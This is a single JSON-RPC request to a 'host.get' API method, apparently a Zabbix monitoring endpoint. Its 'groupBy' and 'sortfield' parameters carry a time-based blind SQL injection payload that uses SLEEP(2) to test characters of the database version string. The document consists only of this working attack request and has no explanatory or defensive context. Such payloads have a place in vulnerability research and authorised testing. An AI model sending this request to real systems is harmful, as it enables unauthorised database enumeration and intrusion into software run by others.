{
  "jsonrpc": "2.0",
  "method": "host.get",
  "params": {
    "countOutput": true,
    "groupBy": [
      "hostid",
      "hostid,(SELECT IF(ascii(substring((version()),1,1))>1,SLEEP(2),0))"
    ],
    "sortfield": "hostid,(SELECT IF(ascii(substring((version()),1,1))>1,SLEEP(2),0))"
  },
  "id": 12
}
